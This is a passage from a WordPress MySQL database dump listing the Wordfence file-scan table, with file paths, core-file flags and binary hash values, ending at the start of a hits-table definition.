�ώv��_%�2��A�?$','',0,'?'),('��+h��vy�{�\\','wp-content/themes/sg-window/img/4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�2ۜSu2���','�̶�-�zPo=a��b���P����c1}��Ty','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('��w0�=_b��&��Oc�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',0,'�G��5]{\"���V�','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('����D�ĥC�x^�,�','wp-content/themes/sg-window/sidebar-1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�2 �Uj����ة]','�hCm����/8����٘^�3��Y���y�','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('���VY�7�z��a]E\Z','wp-includes/wp-includes/ms-site.php',0,'�ظ;�#�t��r�/+0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('��嶈�G�^�g���','wp-content/themes/newsmag/assets/sass/modules/_news-ticker.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ض�pN9�k�R�','��0,\ZG�HHDTŰ���!���B^=�W','',0,'?'),('�o��M�6�ȑq�!E','wp-content/themes/kidzoo-lite/template-parts/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Mm������7h�|t','��_���(�s���~�(+�Y�1�\r�n�_��','',0,'?'),('���\Z0��~�\\�\\D�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/checkbox-multiple.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�ؤ�@ī1T�ޔ','S*��U�y$�ПQy�RUPG\"Y��%�,�Hc�� ','',0,'?'),('�])�� ���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�%~o�.A���0GU','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',0,'l,��r�%�^x�%','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۴iN��fF�=w�','A35(Lt/������v_��#UV猌����M','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�3������9`w�q','wp-content/themes/twentynineteen/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;9���K�K�\'��!','���5.\0��$�V�u�a��+EI�H�h{ �\'','',0,'?'),('�6*uA�H�Hh�.Q�','wp-content/themes/advance/css/foundation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2̵���$��W��`(h','���%��Ϊ��W��J�Ϛ�{���7�7�T`?@]','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;_Ǡ8Є��=�','\0ҧ]W��� �M�o�5m�d�p�Hb#�Wp�M\'','',0,'?'),('�?P���q��%�]2\"','wp-includes/wp-includes/ms-deprecated.php',0,'������K��Mý','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�q_=�s9�N�@ũ�','(�R�Q�c�4o{]�����R��RZW','',0,'?'),('�] ���n_�ˤ[l���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�y?>�F�\n~^�','Z��\n�\r�~YW�m���U����9Ft�Q��','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v,d��,��ȁ��','�-(wE��Cg�E��u���\"�u�7������','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�_O$��.D�]���',' �\ZV�}���0���\r�7����n�^i��@��','',0,'?'),('�}�\Z��F?�Fs�v��#','wp-content/themes/twentynineteen/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','42�����r!�j����','�.\\��J�� ��TC~0���=�/�����','',0,'?'),('�,5X��{�e�','wp-content/plugins/wordfence/js/wfpopover.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('��@�r�;�Q����','wp-content/themes/promote/inc/kirki/assets/js/controls/switch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�oo\ZFK\0�B��a','��X=+�>dS����fPu�h�s����}:L�','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��|M�S�p`gK~�','e�^��\'a;H�% V�<�e5iXT\n~T�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('���~#Q�I���','wp-includes/wp-includes/js/thickbox/thickbox.js',0,'��|}�\Zc�%��9j��','��|}�\Zc�%��9j��','��b?/a#��h�l��������\rk���','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('������4�K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�tŽ�Ћj��?�','�Gc3I��>έ��j�����_/*�D�','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��TQ�)r�J��^���','߁ۤ������a�?�g.E<�ҟ�\"N6��Ed','',0,'?'),('�ΐz�)&6n9M^','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$������Bi�B�5j','L�@$�bK��ަX���/R|^��su��:�B','',0,'?'),('��\\�}���e��mH\'�','wp-content/themes/twentynineteen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q5צ�O/�J�N','\r}p\'qD%�<}��&��-#=s_Oa��6��{','',0,'?'),('�Ԃ��\"Av\n���Z','wp-content/themes/sg-window/inc/customize-other.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؊��keݚ�{�n','`[<��O)i���t�\\%qח��ؼ�Ҋ@2�','',0,'?'),('���Ka\0�>���\\','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/previewer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��֡�\rC\\���_}Ѵ�','Wfs�3��O���e��/�`ͩ�,�t�p�','',0,'?'),('�ٯ��e>��ƫI���','wp-includes/wp-includes/theme.php',0,'W]��(DR{��.','W]��(DR{��.','Xe[ �4\0����\",����d��ځ��#�','',0,'?'),('��ak��fk�#���~','wp-content/themes/wp-barrister/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���s��k��{Fv','�Za(Y �m<���I��Ӟ�\r`��R�;��','',0,'?'),('��p�^a��F齔���-','wp-includes/wp-includes/IXR/class-IXR-date.php',0,'I��VdB+A�J?��#','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('����K(����y�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',0,'��7֊i[L�9ƁH �','��7֊i[L�9ƁH �','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('���� �JX����','wp-includes/wp-includes/js/jquery/ui/effect-puff.js',0,'��CH��w�d���֞','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('�\r���0��se�y��','wp-content/themes/promote/inc/kirki/assets/scss/customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ.M��zA��As�','��G�@�������jA��i\\c��@��..L','',0,'?'),('�!pE������V�tde','wp-includes/wp-includes/Requests/Exception/HTTP/429.php',0,'S��%|F.àZd����','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�G���!#h�9 ��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�J�¦1�f�%��','wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',0,'�h�Co�;�,.!O^�>','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�Pр&{���7���','wp-content/themes/promote/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/8?-�@�m�I��皏','�_�!R�������7�&�4U�������','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.� �ח','',0,'?'),('�\\����3\0h]??�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��&\'��\rv�z','��ɘ���@����l��+X����SZjǛa�','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�b�5��R�â�_#��Q','wp-content/themes/promote/inc/kirki/assets/js/controls/multicolor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ke�r��)���\n=','V��uЍ�#�:��Q�2���L ��ű\Za','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$ ����\n�VFv�ʸ��_�K~\\','',0,'?'),('�us�TB��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('�|��MW���j(�','wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���W�\\�.��A .','��b�D���Z� 6A��m�wl�r�E��0��','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('��� AT�M�Tg�i��','wp-content/themes/kidzoo-lite/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�`�V�Т��','L�26��BP��a�7���N��o�x','',0,'?'),('���\"��M��y���','wp-includes/wp-includes/Requests/Exception/HTTP/408.php',0,'@>1d�IX�O��ȷv�','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a�4','',0,'?'),('��O�|Xl!2�I��oL','wp-content/themes/shopone/images/featured-placeholder.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�����;m4�^��.\r','[d��r�*��@X~wy�cP5�}����(��^\Z','',0,'?'),('���=�����_VI�','wp-content/themes/advance/inc/kirki/assets/js/controls/toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v+��$����%�','����9�MXF��kB�?�u�L�!���b��@','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{� \n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','? ��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('����zOU�?�#c','wp-content/themes/promote/inc/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$�Vֱ �;�Ƥ��','���CIz�q��� ��P�h\'��-�dk���','',0,'?'),('����n�oG1��|*','wp-includes/wp-includes/class.wp-styles.php',0,'�U���vz��4�<q\Z�','�U���vz��4�<q\Z�','���/U��V�tD��b}��F�9S��z���','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�o��Eѩ�$J�\n','wp-includes/wp-includes/Requests/IRI.php',0,'52]��{�}�� `X','52]��{�}�� `X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�!��������','wp-content/themes/promote/inc/kirki/includes/class-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�m8 �R�Dj���,','\"�+�v1�;�<���M_G���;=tD�%i`$','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�>ޤ��+~�tͫ��*','I|��^ψg�?nƏA�d�����]68R��','',0,'?'),('�C�Z�Z�f�}','wp-content/themes/hueman/assets/front/img/demo/1-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���N�VP&q��D1��','�垽3��4#�6v=H`�ϢB���E�','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�0�w��t�Nl嬣','܂s�H�<�&�`�vЖX+v^=0�O]�?!�`','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('�K+��R��LQ�VH','wp-content/themes/hueman/assets/admin/img/col-2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f~���3�w�r��ǚe','�IP���in���e�k�:�4�Z���lӡ','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ƛ�;��^\'��pD?�','�i��`)��\'B�O�踴ǹ�Z{�B�$D�87\0','',0,'?'),('�^����+8��.=�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\"|H4+-|��B�:','�C���uUpѾ�-�G����H�\Zj툑�ϊ�{','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�e+uh��a���7','wp-includes/wp-includes/block-patterns.php',0,'��\'�@~w\0�5','��\'�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�ojdy�f�_b&xN�K�','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#h�x��T�g�/x�','(� 7D�T��M^�����f\0��v�E','',0,'?'),('�u{E�����[Z�:5','wp-content/themes/promote/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�\']�:��s\"�2��','�������;��8��м���:`�����ue*','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�};�1��j7�2��\r�','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#0QY�p˚�AO�e#','4d���SHޘ4��2p⦿ו�/�?� �G�1','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('���y�B�diu�^�','wp-includes/wp-includes/sodium_compat/lib/constants.php',0,'����{�#��l�>m','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('���=�k�1m���','wp-content/themes/twentynineteen/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2٪V�+�T$�\0v�','��\rOK����RƩ�e�D��ړ8݃�j��0@','',0,'?'),('���ߤ�.�?�`gY��X','wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�aM#ҁ�&k�$��u�','g��\r�]S�a���v�o&��7�!أ*��;{�1�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N� ���=���)+�t�','Z�^�BzeISb�pцϺ� �}��{~YB�v','',0,'?'),('����d�j8�\Z ��\"','wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css',0,'xs!�����U,U���','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),('��_7�8r�>�z�`','wp-includes/wp-includes/js/dist/primitives.js',0,'���-�v��t��(4V','���-�v��t��(4V','���a��_��Lx�c$��tU�v�����%��','',0,'?'),('���2�=�j�ʽ��X','wp-content/themes/event/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�H�2�*e�Q�7��YC','4R-�$G�>�&I\\d)�,]�yp�G��}��','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n� ��^�,','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��^DwW!̨�bS���','wp-content/themes/travel-stories/font/Lora-Bold/Lora-Bold.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�Ƙ�>���݈\rFu�','ds��M\n�rZ�l��^��\rvb�>�B','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+� v0~','4��-<4�,\"V�ȱXʘî�hR� K�F�k�','',0,'?'),('�$��OA����sL\'','wp-includes/wp-includes/js/hoverintent-js.min.js',0,' p��.`�u76��?',' p��.`�u76��?','Y!�:\nA��ː ��ګ�Zg�,=�|����','',0,'?'),('�&(h$ٞC�p!�-5z�','wp-content/themes/storeone/css/theme-info.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']˺P�Yj;�\\��xt�','�w#\\!��C�䒓��~�A�G�r-��F<','',0,'?'),('�:5��>`�}4Y߲','wp-content/themes/spidermag/template-parts/archives/archive-masonry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�3���z�%m���','�6�֮i1�4��t�E�ɞ)��\Z��O���','',0,'?'),('�:6Cx1�WW�ȯ��|','wp-content/themes/capacious/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k}��5�2Z�Z���I','�m�J .a�sNJ�A�.��q8M ��I&\". ��\r','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�C������Q��','wp-content/themes/sg-window/page-templates/no-content-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[˹:w�_�CP�\"','7O�r�B�a)+c���%�g%�(!�~C4R','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�?.O��4�o��V֡','��f��ɲ��AE�u�k���L�t+KZ �Ť�','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>����ͯ\ZHdy��4','-�ڣ���|A\rc���w��H4�Up����c�','',0,'?'),('�V&�[��i�x����','wp-includes/wp-includes/class-wp-feed-cache-transient.php',0,'�x��?^>��O�','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('�]\"�@����ե%.�$','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���>T�If�jl�`','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('�f�nV<���2qð','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',0,'�=��p�5%�h$�*�','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('���gv��%�E�','wp-content/themes/skt-pathway/images/hr_double.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`e�7���=��q�i','$��Ѝ��o���}�?�3\Z�+_�)��d�','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>�� \0Ϧ','',0,'?'),('���p��KS_e�eJq9','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�Y�gs|��BMj','���������%*�kb$�ZR��f�i�`�','',0,'?'),('��qM�pavB�.�z�\Z�','wp-content/themes/Endolf/sponsors.php',0,'w��W/�\"��','w��W/�\"��','�3Zӭ�(�\"k#\n[�{��\r=L+I#\rz�','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z� h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('�Þ}:i��qKP���','wp-content/themes/Endolf/FT/js/colorset.js',0,'-�*Ј��`��_��','-�*Ј��`��_��','o�$�V�~,�e�qה2�$3���H�TZ���#�','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL \'8FJ','',0,'?'),('���Y�a�@;��ioʻ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�W��:�.p�j[yyQ','v�6$�-���ȓ��k�Z��Op��]�\"�r5','',0,'?'),('���ׁ���UAQ�.�','wp-content/themes/capacious/assets/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c]�B�����7��','僉k�Y�(�O(��N\'=X֘�B��x5�','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfhits`
--
DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
